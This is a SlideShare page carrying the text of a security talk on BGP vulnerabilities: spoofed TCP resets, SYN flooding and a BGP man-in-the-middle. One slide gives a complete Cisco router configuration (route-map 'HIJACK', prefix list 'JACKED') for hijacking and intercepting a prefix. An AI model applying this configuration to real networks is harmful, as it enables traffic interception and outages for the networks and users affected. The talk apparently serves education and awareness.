SlideShare une entreprise Scribd logo

BGP Vulnerability

Don Anto
Don Anto

BGP Vulnerability - Shutdown Internet

Technologie
1  sur  17
Télécharger pour lire hors ligne
HTTP://IPSECS.COM TIME TO SHUTDOWN INTERNET CORE ROUTER
COMMUNICATION  Analog communication  Digital communication  Analog communication to digital communication convergence  Internet Protocol
FUTURE COMMUNICATION  IP based communication will become the core communication?  Scalability and reliability communication infrastructure?  Vulnerability and security threat?
CORE COMMUNICATION  Access Control List?  Default password issue?  Weak password?  Unencrypted remote login?  Routing protocol vulnerability?  We will focus on Border Gateway  Protocol (BGP) now
BGP VULNERABILITY  BGP messages  TCP vulnerability  BGP internet man in the middle  Documented on RFC 4272
BGP MESSAGES  BGP states? idle, connect, active, opensent, openconfirm, established  BGP message? open, update, notification, keep alive  BGP message modification to poison routing table and Denial of Service  Complex and nearly impractical
TCP VULNERABILITY  BGP and TCP port 179  SPOOFED TCP RST/FIN?  TCP port flooding (SYN)  TCP session ends = BGP idle
BGP MAN IN THE MIDDLE  More specific network prefix wins  Use tracroute to identify routing from source to destination  Use route-map and AS-PATH prepending  Static routing to give information about next-hop-router
router bgp 100 network 10.10.220.0 mask 255.255.255.0 neighbor 2.2.4.2 remote­as 40 neighbor 2.2.4.2 prefix­list JACKED out neighbor 2.2.4.2 route­map HIJACK out neighbor 4.3.2.1 remote­as 10 neighbor 4.3.2.1 prefix­list ANN out neighbor 5.4.3.1 remote­as 60 neighbor 5.4.3.1 prefix­list JACKED out neighbor 5.4.3.1 route­map HIJACK out ! ip route 10.10.220.0 255.255.255.0 4.3.2.1 ! ip prefix­list ANN seq 10 permit 2.2.4.0/24 ip prefix­list ANN seq 15 permit 4.3.2.0/24 ip prefix­list ANN seq 20 permit 5.4.3.0/24 ! ip prefix­list JACKED seq 10 permit 2.2.4.0/24 ip prefix­list JACKED seq 15 permit 4.3.2.0/24 ip prefix­list JACKED seq 20 permit 5.4.3.0/24 ip prefix­list JACKED seq 25 permit 10.10.220.0/24 route­map HIJACK permit 10 set as­path prepend 10 20 200
SOME POLICIES  Design and topology?  Access Control List implementation?  Complex password  Encrypted connection (SSH & HTTPS)
DEMO BGP ATTACK
QUESTION? ANSWER
THANK YOU 

Recommandé

Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBXMatrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Comsec
 
31, Get more from your IPv4 resources
31, Get more from your IPv4 resources31, Get more from your IPv4 resources
31, Get more from your IPv4 resources
Bangladesh Network Operators Group
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Voip softswitch providers
Voip softswitch providersVoip softswitch providers
Voip softswitch providers
VoIP Infotech
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Đồng Quốc Vương
 
A multi tenant platform for sms integrated services
A multi tenant platform for sms integrated servicesA multi tenant platform for sms integrated services
A multi tenant platform for sms integrated services
IJCNCJournal
 
Telex Radio Dispatch: brochure
Telex Radio Dispatch: brochureTelex Radio Dispatch: brochure
Telex Radio Dispatch: brochure
Advantec Distribution
 

Recommandé

Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBXMatrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Telecom Solutions: ETERNITY PE - IP-PBX
Matrix Comsec
 
31, Get more from your IPv4 resources
31, Get more from your IPv4 resources31, Get more from your IPv4 resources
31, Get more from your IPv4 resources
Bangladesh Network Operators Group
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Voip softswitch providers
Voip softswitch providersVoip softswitch providers
Voip softswitch providers
VoIP Infotech
 
Softswitch
SoftswitchSoftswitch
Softswitch
VoIP Infotech
 
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Www ccnav5 net_ccna_1_chapter_8_v5_0_exam_answers_2014
Đồng Quốc Vương
 
A multi tenant platform for sms integrated services
A multi tenant platform for sms integrated servicesA multi tenant platform for sms integrated services
A multi tenant platform for sms integrated services
IJCNCJournal
 
Telex Radio Dispatch: brochure
Telex Radio Dispatch: brochureTelex Radio Dispatch: brochure
Telex Radio Dispatch: brochure
Advantec Distribution
 
I pv6 tutorial
I pv6 tutorialI pv6 tutorial
I pv6 tutorial
Fred Bovy
 
BGP Prime
BGP Prime BGP Prime
BGP Prime
KHNOG
 
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs CollectionCCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CAS
 
NAT Ccna
NAT CcnaNAT Ccna
NAT Ccna
singhsukdeep
 
Ccna 2 Final V4 1
Ccna 2 Final V4 1Ccna 2 Final V4 1
Ccna 2 Final V4 1
stigerj
 
Ccna 1 5
Ccna 1 5Ccna 1 5
Ccna 1 5
Vahdet Shehu
 
Networking Fundamentals: Local Networks
Networking Fundamentals: Local NetworksNetworking Fundamentals: Local Networks
Networking Fundamentals: Local Networks
Andriy Berestovskyy
 
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sipTlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
Anna Volynkina
 
Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)
Andriy Berestovskyy
 
Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5
Đồng Quốc Vương
 
Ccna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 AnswersCcna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 Answers
ccna4discovery
 
BGP Multihoming Techniques
BGP Multihoming TechniquesBGP Multihoming Techniques
BGP Multihoming Techniques
APNIC
 
Nat 03
Nat 03Nat 03
Nat 03
Davinder Chauhan
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
robertoxe
 
How to configure static nat on cisco routers
How to configure static nat on cisco routersHow to configure static nat on cisco routers
How to configure static nat on cisco routers
IT Tech
 
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching HubsLANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
Ronald Bartels
 
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGPDynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
Maximilan Wilhelm
 
Routing Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. MikrotikRouting Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. Mikrotik
KHNOG
 
IPv6 Static Routes
IPv6 Static RoutesIPv6 Static Routes
IPv6 Static Routes
Irsandi Hasan
 
Sip crash course
Sip crash courseSip crash course
Sip crash course
Jonas Borjesson
 
225735365 ccna-study-guide-a
225735365 ccna-study-guide-a225735365 ccna-study-guide-a
225735365 ccna-study-guide-a
homeworkping10
 
VYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edgeVYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edge
Faelix Ltd
 

Contenu connexe

Tendances

I pv6 tutorial
I pv6 tutorialI pv6 tutorial
I pv6 tutorial
Fred Bovy
 
Ccna 2 Final V4 1
Ccna 2 Final V4 1Ccna 2 Final V4 1
Ccna 2 Final V4 1
stigerj
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
robertoxe
 

Tendances (20)

I pv6 tutorial
I pv6 tutorialI pv6 tutorial
I pv6 tutorial
 
BGP Prime
BGP Prime BGP Prime
BGP Prime
 
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs CollectionCCNA 200-301 IPv6 addressing and subnetting MCQs Collection
CCNA 200-301 IPv6 addressing and subnetting MCQs Collection
 
NAT Ccna
NAT CcnaNAT Ccna
NAT Ccna
 
Ccna 2 Final V4 1
Ccna 2 Final V4 1Ccna 2 Final V4 1
Ccna 2 Final V4 1
 
Ccna 1 5
Ccna 1 5Ccna 1 5
Ccna 1 5
 
Networking Fundamentals: Local Networks
Networking Fundamentals: Local NetworksNetworking Fundamentals: Local Networks
Networking Fundamentals: Local Networks
 
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sipTlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
 
Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)
 
Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5Ccna 2 chapter 11 2014 v5
Ccna 2 chapter 11 2014 v5
 
Ccna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 AnswersCcna 3 Chapter 6 V4.0 Answers
Ccna 3 Chapter 6 V4.0 Answers
 
BGP Multihoming Techniques
BGP Multihoming TechniquesBGP Multihoming Techniques
BGP Multihoming Techniques
 
Nat 03
Nat 03Nat 03
Nat 03
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
 
How to configure static nat on cisco routers
How to configure static nat on cisco routersHow to configure static nat on cisco routers
How to configure static nat on cisco routers
 
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching HubsLANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
LANNET LANswitch Plus LET-36/20/10 Enterprise Switching Hubs
 
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGPDynamische Routingprotokolle Aufzucht und Pflege - BGP
Dynamische Routingprotokolle Aufzucht und Pflege - BGP
 
Routing Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. MikrotikRouting Implementation - Cisco vs. Mikrotik
Routing Implementation - Cisco vs. Mikrotik
 
IPv6 Static Routes
IPv6 Static RoutesIPv6 Static Routes
IPv6 Static Routes
 
Sip crash course
Sip crash courseSip crash course
Sip crash course
 

Similaire à BGP Vulnerability

WIRELESS NETWORKS
WIRELESS NETWORKSWIRELESS NETWORKS
WIRELESS NETWORKS
dsit1234
 
WIRELESS NETWORK
WIRELESS NETWORKWIRELESS NETWORK
WIRELESS NETWORK
prakash m
 
Lan Network with Redundancy
Lan Network with RedundancyLan Network with Redundancy
Lan Network with Redundancy
Santanu Mukherjee
 

Similaire à BGP Vulnerability (20)

225735365 ccna-study-guide-a
225735365 ccna-study-guide-a225735365 ccna-study-guide-a
225735365 ccna-study-guide-a
 
VYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edgeVYOS & RPKI at the BGP as edge
VYOS & RPKI at the BGP as edge
 
Surviving The Stump The Chump Interview Questions
Surviving The Stump The Chump Interview QuestionsSurviving The Stump The Chump Interview Questions
Surviving The Stump The Chump Interview Questions
 
Normas y Estándares
Normas y EstándaresNormas y Estándares
Normas y Estándares
 
I pv4 and ipv6
I pv4 and ipv6I pv4 and ipv6
I pv4 and ipv6
 
5G Transport Network Technology.pptx
5G Transport Network Technology.pptx5G Transport Network Technology.pptx
5G Transport Network Technology.pptx
 
Introduction to TCP/IP
Introduction to TCP/IPIntroduction to TCP/IP
Introduction to TCP/IP
 
6.Routing
6.Routing6.Routing
6.Routing
 
Network
NetworkNetwork
Network
 
CCNA ppt Day 9
CCNA ppt Day 9CCNA ppt Day 9
CCNA ppt Day 9
 
Chapter14ccna
Chapter14ccnaChapter14ccna
Chapter14ccna
 
BGP Traffic Engineering with SDN Controller
BGP Traffic Engineering with SDN ControllerBGP Traffic Engineering with SDN Controller
BGP Traffic Engineering with SDN Controller
 
WIRELESS NETWORKS
WIRELESS NETWORKSWIRELESS NETWORKS
WIRELESS NETWORKS
 
WIRELESS NETWORK
WIRELESS NETWORKWIRELESS NETWORK
WIRELESS NETWORK
 
06 tk 1073 network layer
06 tk 1073 network layer06 tk 1073 network layer
06 tk 1073 network layer
 
Mpls Services
Mpls ServicesMpls Services
Mpls Services
 
Lan Network with Redundancy.ppt
Lan Network with Redundancy.pptLan Network with Redundancy.ppt
Lan Network with Redundancy.ppt
 
Lan Network with Redundancy
Lan Network with RedundancyLan Network with Redundancy
Lan Network with Redundancy
 
BGP Overview
BGP OverviewBGP Overview
BGP Overview
 
Protocols
ProtocolsProtocols
Protocols
 

Plus de Don Anto

IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
Don Anto
 

Plus de Don Anto (7)

Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in Cyberspace
 
IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
 
Network & Computer Forensic
Network & Computer Forensic Network & Computer Forensic
Network & Computer Forensic
 
Web & Wireless Hacking
Web & Wireless HackingWeb & Wireless Hacking
Web & Wireless Hacking
 
Spying The Wire
Spying The WireSpying The Wire
Spying The Wire
 
Distributed Cracking
Distributed CrackingDistributed Cracking
Distributed Cracking
 
Deep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDeep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking Philosopy
 

Dernier

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 

Dernier (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 

BGP Vulnerability